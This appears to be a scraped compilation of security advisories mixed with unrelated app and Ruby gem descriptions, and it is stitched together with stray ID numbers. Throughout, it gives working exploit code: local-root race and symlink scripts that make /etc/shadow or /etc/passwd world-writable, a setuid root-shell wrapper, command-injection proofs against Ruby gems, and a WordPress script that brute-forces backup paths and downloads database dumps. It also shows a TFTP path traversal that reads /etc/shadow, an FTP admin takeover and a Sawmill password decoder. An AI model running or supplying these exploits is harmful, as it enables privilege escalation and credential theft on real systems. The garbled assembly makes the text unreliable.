- ARM based: PHP, Lighttpd, MySQL, CVS, Rsync, VNC, SSH command line, Port forward, MySQL monitor, Traceroute
**Includes a PHP Server!**
Note:
- The permissions for receiving and sending SMS are for the optional SMS Gateway Server.
**Light or dark Holo theme!**
A few general features:
- Encryption for settings and password login support!
- Tasker and Llama support!
- Start / Stop servers automatically using WIFI / SMS / call / power or cronjob rules! Or use the 'Trigger Server' for more!
- Set a port, network interface to listen on, backlog, logging (to file), etc. And if rooted set a port below 1024.
- Widget support!
- A lot more!
**Change your device to a NAS Server, dedicated server and/or honeypot!**
Network tools:
- Remote Control Client
- Simple .htaccess editor
- Connectability
- IP Calculator (IPv4 / IPv6)
- Port Scanner
- MySQL Monitor
- Whois
- Raw socket (TCP / UDP)
- Command line
- Ping
- Network speed
- HTTP Headers
- Wake On LAN (WOL)
- Lookup (DNS, IP, Host, Mac to Vendor)
- Traceroute
- UPnP Port Mapper
Servers:
- CVS Server
- DC Hub Server (Direct Connect Hub)
- DHCP Server
- DHCP Proxy Server
- DHCP Relay Server
- UPnP Server
- DNS Server
- DNSMasq Server
- Dynamic DNS Updater: DDNS services ChangeIP, DNSdynamic, DNSexit, DNSMadeEasy, DNS-O-Matic, DNSPark, DtDNS, DynDNS, easyDNS, eNom, Namecheap, No-IP, ZoneEdit, etc
- eDonkey Server
- Email Server: POP3, SMTP
- FTP Proxy Server
- FTP Server
- FTP Root Server
- FTPS Server
- FTPES Server
- Flash Policy Server
- Git Server
- Gopher Server
- HTTP Proxy Server
- HTTP Snoop Server
- ICAP Server
- IRC Bot
- IRC Server
- ISCSI Server
- Icecast Server
- Load Balancer Server
- LPD Server (Printer Server)
- MQTT Server
- Memcached Server
- MongoDB Server
- Multicast DNS Server (Bonjour)
- MySQL Server
- NFS Server
- NTP Server
- NZB Downloader Client
- Napster Server
- PHP Server and Lighttpd Server (optional PHPMyAdmin, PHPFileManager, etc)
- Port Forwarder
- Proxy Server
- PXE Server (Network Boot)
- Remote Control App Server
- Rsync Server
- RTMP Server
- RTMP Proxy Server
- SIP Server
- SMB / CIFS Server (Samba)
- SMPP Server
- SMS Gateway
- SOCKS Server
- SSH Server
- SCP Server
- Server Monitor
- SFTP Server
- Stomp Server
- Styx Server
- Syslog Server
- TFTP Server
- Telnet Server
- Test Server: Echo, Discard, CHARGEN, QOTD
- Time Server
- Trigger Server
- Unison Server
- UPnP Port Mapper
- VNC Server
- VPN Server
- Wake On LAN client
Visit us on: http://www.icecoldapps.com/
Follow us on Twitter: https://twitter.com/IceColdApps
Like us on Facebook: http://www.facebook.com/IceColdApps
98151
Generates thumbshots of URLs by using Webkit and QT4.
91839
thttpd is a simple, small, portable, fast, and secure HTTP server.
60381 23828
Send your application errors to our hosted service and reclaim your inbox.
Sprout is a modular set of tools that take the tedium and frustration out of creating and managing programming projects by automatically installing and configuring external tools, libraries, commands and build tasks. Bundles are currently available to support ActionScript 2, ActionScript 3, Flex and AIR development.
100598
A Ruby implementation of SFP agent.
105971
Sounder is a ruby gem API for Mac OSX's afplay command.
irb(main):098:0> @file = "\"id;/usr/bin/id>/tmp/p;\""
=> "\"id;/usr/bin/id>/tmp/p;\""
irb(main):099:0> system %{/bin/echo "#{@file}" }
id
sh: 1: : Permission denied
=> false
irb(main):100:0>
larry@underfl0w:/tmp$ cat /tmp/p
uid=1000(larry) gid=600(staff) groups=600(user)
96278
Opens arbitrary text in your browser.
nobody@pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done
Will pop up a JavaScript alert in the browsers of other users of the gem.
93490
Captures screenshots of web pages.
107783
SAP DB is a free enterprise database (http://www.sapdb.org). An exploitable race condition exists during installation that can be won to yield root to a local malicious user. An executable is world-writable before a setuid bit is set by the installation program. This condition exists for both the production version 7.3.0.29 and the beta version 7.4.3.7 beta (www.sapdb.org/tgz_linux.htm).
#!/bin/perl
while (1) {
$test =`grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;
if ( $test =~ /PRECOM/ ) {
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
exit(1);
}
}
/*##Larry W. Cashdollar, lwc@vapid.dhs.org
##This is just a wrapper to boost our privs from euid(0) to uid(0) guid(0) */
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
if (!setreuid (0, 0))
printf ("We have root, getting sgid perms and spawning shell.\n");
else
{
printf ("Ack, We lost the race.\n");
_exit (0);
}
setregid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
11915
This is an iOS Ruby app; you can learn, run and share Ruby scripts. Features: Autocomplete. Auto Indent. Code color. In the built-in browser or the txt editor, select the text to run. Horizontal screen development. Code templates: the contents of a new file are copied from the template file. You can enter Ruby code by keyboard or two-dimensional code and then execute it; the gets function is supported. You can adjust the code color and font size, and move the cursor left, right, up and down for easy reading and writing. You can upload learning materials from your computer via WiFi, over HTTP or FTP. The file system supports txt, pdf, chm, mp3, m4v, zip, gif, png, html, rb, doc ... You can find learning materials with the built-in browser. You can save Ruby code and learning materials, and modify or delete the saved files. You can control the background image and color, execution voice, background animation, text color and shadow, interface switch animation, and the number and order of the tabs on the main interface to create your own learning software. You can learn Ruby; the system provides some basic learning materials. You can generate two-dimensional codes from Ruby code or learning materials for easy sharing. You can share code by Email, Weibo, Twitter and Facebook. You can use the counter and light in the Setting tab.
97201
This app is a SSH terminal server AND an SFTP file server.
110742
A simple Ruby wrapper around gpg command for file encryption. rgpg is a simple API for interacting with the gpg tool. It is specifically designed to avoid altering global keyring state by creating temporary public and secret keyrings on the fly for encryption and decryption.
larry@sp0rk:~$ cat /bin/run
#!/bin/sh
echo "Command Injection" > /tmp/rci.txt
irb(main):027:0* Rgpg::GpgHelper.encrypt_file 'mykey.pub', 'myfile.txt', 'myfile.txt.enc&run'
=> nil
irb(main):028:0> gpg: keyring `/tmp/gpg-key-ring20130804-2970-1et1k4c' created
gpg: processing message failed: eof
After above completes:
larry@sp0rk:~$ ls -l /tmp/rci.txt
-rw-rw-r-- 1 larry larry 18 Aug 4 11:12 /tmp/rci.txt
larry@sp0rk:~$ cat /tmp/rci.txt
Command Injection
larry@sp0rk:~$
95948
Python Interpreter is a native python development application for the iPad/iPhone. It is available for iOS 4 and above.
96719
The aim of pServ (pico Server) is to create a portable, small webserver. Coded in portable C with Unix being the main reference platform, but porting is encouraged. Portability and small footprint should enable the use of pServ on a workstation as well as
#include <stdlib.h>
#include <stdio.h>
#include <strings.h> /* bzero() */
int
main (int argc, char *argv[])
{
int i;
char buffer[300];
if (argc < 3)
{
fprintf (stderr, "usage: %s <number of X> <number of A>\n", argv[0]);
return (1);
}
bzero (buffer, 300);
/* Build a request path of argv[1] 'X's followed by argv[2] 'A's. */
for (i = 0; i <= atoi (argv[1]); i++) buffer[i] = 'X';
for (i = 0; i <= atoi (argv[2]); i++)
buffer[i + atoi (argv[1])] = 'A';
printf ("GET /%s HTTP/1.0\r\n", buffer);
return (0);
}
102214
The Firebird(tm) database engine is derived from the InterBase(r) product currently owned by Borland. The documentation for InterBase v6.0 also applies to the current FireBird release. InterBase documentation is available in Adobe Acrobat format from http://info.borland.com/techpubs/interbase/. The "information database" stored in the file isc4.gdb is readable and writable for all users with the default rpm installation of Firebird-1.0.3 for Linux.
2259 6219
CLI client for the PointHQ DNS Hosting System.
108577
Create a colorful dial keyboard, with each dial button displaying a different color! You can rotate, scale or move the picture when you edit the background image, set the picture fuzzy, or long press (2 seconds) to fit the background image to the window size; try it! You can set different colors for different groups! You can set a friend's head image by clicking the friend's head in the friend table! You can organise your contacts, including entries with the same name, no name, no number or no e-mail.
This is an iOS Perl app; you can learn, run and share Perl scripts. Features: Autocomplete. Auto Indent. Code color. In the built-in browser or the txt editor, select the text to run. Horizontal screen development. Code templates: the contents of a new file are copied from the template file. You can enter Perl code by keyboard or two-dimensional code and then execute it; the gets function is supported. You can adjust the code color and font size, and move the cursor left, right, up and down for easy reading and writing. You can upload learning materials from your computer via WiFi, over HTTP or FTP. The file system supports txt, pdf, chm, mp3, m4v, zip, gif, png, html, rb, doc ... You can find learning materials with the built-in browser. You can save Perl code and learning materials, and modify or delete the saved files. You can control the background image and color, execution voice, background animation, text color and shadow, interface switch animation, and the number and order of the tabs on the main interface to create your own learning software. You can learn Perl; the system provides some basic learning materials. You can generate two-dimensional codes from Perl code or learning materials for easy sharing. You can share code by Email, Weibo, Twitter and Facebook. You can use the counter and light in the Setting tab.
97200
PatchLink Update provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats.
#!/bin/perl
while(1){
`echo "chmod 777 /etc/shadow" > /var/tmp/runme`;
}
41152
PatchLink Update™ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of patches throughout your enterprise. PatchLink Update significantly decreases the costs involved in securing your organization from worms, Trojans, viruses and other malicious threats.
nobody:/tmp> ln -s /etc/shadow patchlink.tmp
After logs are rotated /etc/shadow will be size 0, since patchlink.tmp is removed by logtrimmer after the log rotation process has finished.
41152
Send deploy notifications to Newrelic service when deploying with Paratrooper.
101839
Send deploy notifications to Pingdom service when deploying with Paratrooper.
101847
Oracle Exadata is the only database machine that provides extreme performance for both data warehousing and OLTP applications, making it the ideal platform for consolidating on private clouds. It is a complete package of servers, storage, networking, and software that is massively scalable, secure, and redundant. With Oracle Exadata customers can reduce IT costs through consolidation, store up to ten times more data, improve performance of all applications, deliver a faster time-to-market by eliminating systems integration trial and error, and make better business decisions in real time.
86621 86620
The open office desktop suite.
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
will result in the password file being overwritten with:
# create the proper autoresponse file
<file>
cat << EOF > /tmp/${USER}autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oohome
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
</file>
33970
The WordPress CMS has persistent XSS in the media library admin panel. This is a duplicate, already discussed here: https://core.trac.wordpress.org/ticket/21917
P-DB-Backup allows you to easily back up your core WordPress database tables. You may also back up other tables in the same database.
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
DATE="20141031"; #Date to search
if [ ! -e rainbow ]; then
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
char string[16] = "0123456789abcdef";
int x, y, z, a, b;
for (x = 0; x < 16; x++)
for (y = 0; y < 16; y++)
for (z = 0; z < 16; z++)
for (a = 0; a < 16; a++)
for (b = 0; b < 16; b++)
printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Location $CPATH Found";
echo "[+] Received $RESULT";
echo $x > found.txt;
break; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=6;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi
# Now that we have the directory lets try to locate the database backup file.
K=999;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo "[+] Database backup $CPATH Found";
echo "[+] Received $RESULT";
wget $CPATH
exit; #break here
fi;
echo -n "Percent Done: ";
Y=`echo "scale=2;($Z/$K)*100"|bc`;
echo -n $Y
echo "%";
Z=$(( $Z + 1 ));
done
Xitami is a Web and FTP server, originally developed by iMatix Corporation as a free, open-source product from 1996 to 2000. It ran as a single process with a small footprint. It was not as fast as the fastest servers but scaled well. It supported several web application protocols and was very portable. It also had a web interface to configure the web/FTP server.
20195
Webbynode Deployment Gem
100920
OCE 9600 plotter is a printing hardware device
Netscape is a common web browser available for multiple operating systems.
A ruby wrapper for ImageMagick or GraphicsMagick command line. Tested on both Ruby 1.9.2 and Ruby 1.8.7.
91231
Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications.
91552 91551 91553 78219
Lynx is a text browser for the World Wide Web
The following URL triggers the bug:
[larryc@harod ~ $] lynx http://lwc%d%d:hsVd632k@vapid.dhs.org/bleh:80
Results in the following logged to syslog:
Dec 25 23:11:00 vapid lynx[5160]: http://lwc-1077939384134744128:******@vapid.dhs.org/bleh:80
Fix, line 7995:
-syslog (LOG_INFO|LOG_LOCAL5, buf);
+syslog (LOG_INFO|LOG_LOCAL5,"%s", buf);
97554
Ruby command line wrapper for MySQL.
108579
Lipsiadmin is a new revolutionary admin for your projects. Lipsiadmin is based on the Ext JS 3+ framework (with prototype adapter) and is ready for Rails 2.+
Gem for interacting with the API of lingq.com. It's a language learning website, and it's pretty useful, but I want to be able to work on my flashcards offline. This gem is being written to be included in a desktop client (and maybe eventually a mobile client), but will certainly still be useful as a standalone api wrapper for other projects that want to interact with Lingq.com
108585
Ruport is a powerful report generation engine that allows users to generate custom ERb templates and easily query various forms of SQL databases via DBI. It provides helper methods and utilities to generate professional reports quickly and cleanly.
108581
Easily interface with the Longman Dictionary of Contemporary English API from Ruby
91870
A small gem which provides a secure method of logging into the GATech LAWN network.
108576
These are the common recipes we've been using here at The Kompanee. Packaged as a gem.
108593
A gem to ease generating image previews (thumbnails) of various files.
92228
Capistrano is an open source tool for running scripts on multiple servers. Its primary use is for easily deploying applications. While it was built specifically for deploying Rails apps, it's pretty simple to customize it to deploy other types of applications. This package is a deployment "recipe" to work with symfony (both 1 and 2) applications. This is a fork to make working with our deployment system easier.
108572 108571
Splits documents up into pdf files.
92117
SSH toolbox to make running logs, sync, cache commands easier for a given rails app
108573
Lightweight content management system for middle and small teams.
108530 108529
JSpec is a minimalistic JavaScript behavior driven development framework, providing simple installation, extremely low learning curve, absolutely no pollution to core prototypes, async request support, and incredibly sexy syntax, tons of matchers and much more.
Midikeys is a sound editing program for SGI IRIX 6.x.
8515
InstallAnywhere (www.zerog.com) is a software framework that simplifies software installation on multiple client and server platforms. This software is used by vendors such as LimeWire (www.limewire.org). During execution this software insecurely creates two files in /tmp that can be used to clobber system files through symlink attacks. For one file a race condition exists to determine the filename; the other requires no guesswork.
8236
The infiniband diagnostic utility.
90926
IBM Informix Dynamic Server (IDS) is a strategic data server in the IBM Information Management Software portfolio that provides blazing online transaction processing (OLTP) performance, legendary reliability, and nearly hands-free administration to businesses of all sizes. IDS 10 offers significant improvements in performance, availability, security, and manageability over previous versions, including patent-pending technology that virtually eliminates downtime and automates many of the tasks associated with deploying mission-critical enterprise systems.
29349 29348
Upload an image to Gyazo.com.
108563
GNMS is a graphical tool used to monitor state of network elements.
108594
Dragonfly is an on-the-fly Rack-based image handling framework. It is suitable for use with Rails, Sinatra and other web frameworks. Although it's mainly used for images, it can handle any content type.
96798
flickrcaptionr is a gem which lets you easily retrieve images (from flickr and other sources), resize them (cropping etc as desired), and overlay classic "image macro" text on them. It can be used as a web service, command-line tool or as a library in your application.
Needs PoC
A ruby wrapper for swftool command line tool. http://www.swftools.org/ Flash tool is small and mini tool for creating swf files from pdfs, pictures and fonts and parsing data from flash files.
90829
The PrimeBase Database Server is a relational Database Management System (DBMS) for Mac, UNIX and Windows platforms. The PrimeBase Database Server supports all common database access standards (PBT, SQL, ODBC, JDBC, PHP, Perl, RealBasic, EOF and DAL) and protocols (TCP/IP, Shared Memory and Appletalk)
2259 6219
Plaintext User Stories Parser supporting native programming languages. Especially Objective-C
nobody@sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
The above will pop up a JavaScript alert in other gem users' browsers.
96975
curl API for ruby.
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
91230
Converts Email to PDF files.
93395
MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available.
root@pangea:/home/done/tftpserver# tftp 192.168.0.26
tftp> get ../../etc/shadow
Received 652 bytes in 0.0 seconds
tftp> quit
root@debian:/home/done/tftpserver# head shadow
root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::
Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures.
Exploit: there is no race condition here, just create the link.
[lwc@misery] ln -s /etc/passwd /tmp/spinning
Wait until root is done installing...
[lwc@misery] ls -l /etc/passwd
-rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd
13949
Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures.
There is a race condition between when gunzip is extracted and when it is used during installation, during which a malicious local user could inject code to compromise the system.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the above as a non-administrative user.
13949
Sonata is a teleconferencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge component of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant Technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.
$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot
1694
Sonata is a teleconferencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge component of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant Technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer.
I. Application Server, Solaris 2.x
By using available default services on the host an attacker can enumerate accounts. Using this easily obtainable account information combined with poor password selection and weak file permissions, a remote attacker can gain root access. The passwords guessed are the default for all installations of Sonata. By default xhost authentication is disabled, allowing a remote attacker to log keystrokes and capture screenshots of the X console.
II. Bridging Server, OS/2 Warp
These default passwords are also re-used on the bridging host (OS/2), which has telnet enabled for remote administration. I am not going to detail the exploit because the methods used to access these systems are only the most basic information gathering techniques one would use to audit a host.
91319
Solaris Sparc patch cluster January 2013.
If the following is run:
while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done
during patch installation, /etc/shadow becomes world-writable.
Vladz suggested:
Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command.
$ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done
or in C:
while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;
I am telling this because I think that moving a file takes less syscalls (one at least) than a "echo string >> file" that open(), write() and close() the file.
89243
Solaris Patch Cluster for SPARC systems March 2013.
# A simple attack in /tmp
$ cd /tmp
$ ln -s /etc/shadow CLEANUP
# Will overwrite the contents of /etc/shadow.
Through the use of symlinking temporary files created by /usr/bin/catman upon execution by root a local user can clobber root owned files.
#!/usr/local/bin/perl -w
# The problem is catman creates files in /tmp insecurely. They are based on the
# PID of the catman process, catman will happily clobber any files that are
# symlinked to that file.
# The idea of this script is to create a block of symlinks to the target file
# with the current PID as a starting point. Depending on what load your
# system has this creates 1000 files in /tmp as sman_$currentpid + 1000.
# The drawback is you would have to know around when root would be executing
# catman.
# A better solution would be to monitor for the catman process and create the
# link before catman creates the file. I think this is a really small window
# however. This worked on a patched Solaris 2.7 box (August 2000 patch
# cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
# 11/21/2000 Vapid Labs.
# http://vapid.dhs.org
$clobber = "/etc/passwd"; # file to clobber
$X = getpgrp();
$Xc = $X; # Constant
$Y = $X + 1000; # Constant
while ($X < $Y) {
print "Linking /tmp/sman_$X to $clobber :";
# Change $clobber to what you want to clobber.
if (symlink ($clobber, "/tmp/sman_$X")) {
print "Success\n";
} else {
print "failed, Busy system?\n";
}
$X = $X + 1;
}
# Watch /tmp and see if catman is executed in time.
while (1) {
$list = "/usr/bin/ls -l /tmp | grep sman | grep root |";
open (LIST, $list) or die "cant open ls...\n";
while (<LIST>) {
@args = split "_", $_;
chop ($args[1]);
if ($args[1] >= $Xc && $args[1] <= $Y) {
print "Looks like pid $args[1] is the winner\n cleaning....\n";
`/usr/bin/rm -f /tmp/sman*`;
exit(1);
}
}
close (LIST);
}
6024
If the system administrator is updating the system using Update Manager or smpatch (in multi-user mode), a local user could execute commands as root. This only affects x86 systems, as this code resides under a case statement checking that the platform is Intel based.
#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)
echo "[+] Creating evil shell"
cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
char *shell[2];
shell[0] = "sh";
shell[1] = NULL;
setreuid (0, 0);
setregid (0, 0);
execve ("/bin/sh", shell, NULL);
return(0);
}
EOF
echo "[+] Hope you've got gcc on here, compiling..."
gcc r00t.c -o /tmp/r00t
mkdir -p /tmp/diskette_rc.d/
echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"
until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t
95017
SawMill is a site log statistics package for UNIX, Windows and MacOS.
/*Dehash password for Sawmill admin account.
Larry W. Cashdollar
lwc@vapid.dhs.org
http://vapid.dhs.org
usage ./decrypt cyphertext
*/
#include <stdio.h>
#include <string.h>
/* plaintext alphabet and the substitution table it is mapped to (same length) */
char *alpha = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|";
char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
int
main (int argc, char **argv)
{
int x, y;
char cypher[128];
if (argc < 2) {
fprintf (stderr, "usage: %s cyphertext\n", argv[0]);
return 1;
}
strncpy (cypher, argv[1], sizeof (cypher) - 1);
cypher[sizeof (cypher) - 1] = '\0';
/* each ciphertext character is looked up in the table and replaced by its plaintext */
for (x = 0; x < strlen (cypher); x++) {
for (y = 0; y < strlen (encode); y++)
if (cypher[x] == encode[y]) {
printf ("%c", alpha[y]);
break;
}
}
printf ("\n\"+\" could also be a space [ ]\n");
return 0;
}
352 353
A set of utility classes to extract meta data from different file types.
90717
Transfer files between Android devices and computers without a USB cable and Windows software driver. Transfer files to and from your Android device over the Internet. Use Windows Explorer to transfer files between your Android device and your computer by drag and drop. You can add additional users with read only permission for download, and read and write permission for both upload and download.
Edit the users.properties file and re-upload.
Connected to 192.168.0.29.
220 Service ready for new user.
Name (192.168.0.29:larry): android
331 User name okay, need password for android.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> cd ftpConfig
250 Directory changed to /ftpConfig
ftp> ls
229 Entering Passive Mode (|||49825|)
150 File status okay; about to open data connection.
-rw------- 1 user group 679 Sep 7 16:37 users.properties
226 Closing data connection.
ftp> get users.properties
local: users.properties remote: users.properties
229 Entering Passive Mode (|||59616|)
150 File status okay; about to open data connection.
100% |********************************************| 695 9.60 MiB/s --:-- ETA
226 Transfer complete.
695 bytes received in 00:00 (121.85 KiB/s)
ftp>
If we take a look at the users.properties file:
#Generated file - don't edit (please)
#Sat Sep 07 16:13:44 EDT 2013
ftpserver.user.android.enableflag=true
ftpserver.user.admin.maxloginnumber=0
ftpserver.user.android.writepermission=true
ftpserver.user.android.idletime=0
ftpserver.user.admin.homedirectory=/mnt/sdcard <- change to /
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.maxloginperip=0
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <- replace with 23594328\:070A6394BF17CD0A401F12ACC021714F, the 'android' password [1]
ftpserver.user.admin.downloadrate=0
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.idletime=0
ftpserver.user.admin.uploadrate=0
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
Upload the file as the android/android user to ftpConfig/users.properties. The next time the ftp server is started (on/off button in the app interface) you can log in as admin.
Login as admin/android:
ftp> user admin
331 User name okay, need password for admin.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> dir
229 Entering Passive Mode (|||52585|)
150 File status okay; about to open data connection.
dr-x------ 3 user group 0 Jul 11 20:09 acct
d--x------ 3 user group 0 Aug 17 09:09 cache
d--x------ 3 user group 0 Jul 11 20:09 config
dr-x------ 3 user group 0 Dec 31 1969 d
d--x------ 3 user group 0 Sep 16 2012 data
dr-x------ 3 user group 0 Jul 11 20:15 dev
d--x------ 3 user group 0 Sep 2 14:07 dropbox
dr-x------ 3 user group 0 Mar 29 13:48 etc
dr-x------ 3 user group 0 Jul 11 20:09 mnt
dr-x------ 3 user group 0 Dec 31 1969 proc
d--x------ 3 user group 0 Feb 26 2013 root
d--x------ 3 user group 0 Dec 31 1969 sbin
drwx------ 3 user group 0 Sep 7 15:09 sdcard
dr-x------ 3 user group 0 Jul 11 20:09 sys
dr-x------ 3 user group 0 Mar 29 13:49 system
dr-x------ 3 user group 0 Mar 29 13:49 vendor
-r-------- 1 user group 118 Dec 31 1969 default.prop
---------- 1 user group 94200 Dec 31 1969 init
---------- 1 user group 1677 Dec 31 1969 init.goldfish.rc
---------- 1 user group 11658 Dec 31 1969 init.omap4430.rc
---------- 1 user group 14869 Dec 31 1969 init.rc
-r-------- 1 user group 0 Dec 31 1969 ueventd.goldfish.rc
-r-------- 1 user group 840 Dec 31 1969 ueventd.omap4430.rc
-r-------- 1 user group 4203 Dec 31 1969 ueventd.rc
226 Closing data connection.
ftp>
Tested on Kindle Fire & Droid Bionic.
[1] MD5 of admin, http://www.md5-hash.com/md5-hashing-decrypt/21232f297a57a5a743894a0e4a801fc3, but it didn't allow me to log in when I used admin/admin.
97621
ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It can be used as part of a test fixture or embedded in a program.
./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
The problem code is below
# Ls interface used by List and NameList

module Ls

  def ls(ftp_path, option)
    path = expand_ftp_path(ftp_path)
    dirname = File.dirname(path)
    filename = File.basename(path)
    command = [
      'ls',
      option,
      filename,              <-- ;cmd inject
      '2>&1',
    ].compact.join(' ')
    if File.exists?(dirname)  <- file has to exist to exec ls command
      list = Dir.chdir(dirname) do
        `#{command}`          <-- exec?
90784
A set of utility classes to extract meta data from different file types
91450
A simple API for creating and finding sets of data in your database, built on ActiveRecord.
108582
A simple API for creating and finding sets of data in your database, built on ActiveRecord.
108583
Rails generators that make it easy to spin up a CI instance in the cloud. Formerly known as 'Lobot'.
touch /tmp/perlbrew-installer
echo "id >/tmp/foo" >> /tmp/perlbrew-installer
108586
Centrify Server Suite secures the industry's broadest range of mission-critical servers from identity-related insider risks and outsider attacks, making security and regulatory compliance repeatable and sustainable. The solution leverages existing Active Directory infrastructure to centrally manage authentication, access controls, privileged identities, policy enforcement and compliance for on-premises and cloud resources.
So our quick dirty exploit:
larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0 ; done
Will get us our command executed:
larry@h0g:/tmp$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
larry@h0g:/tmp$
It might also work to create the file centrify.cmd.UID, then monitor it with inotify (IN_ATTRIB) for the execute bit being set. When the execute bit is set, write our malicious command to the file as it is about to be executed by root.
/*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
Centrify released a fix very quickly - nice vendor response.
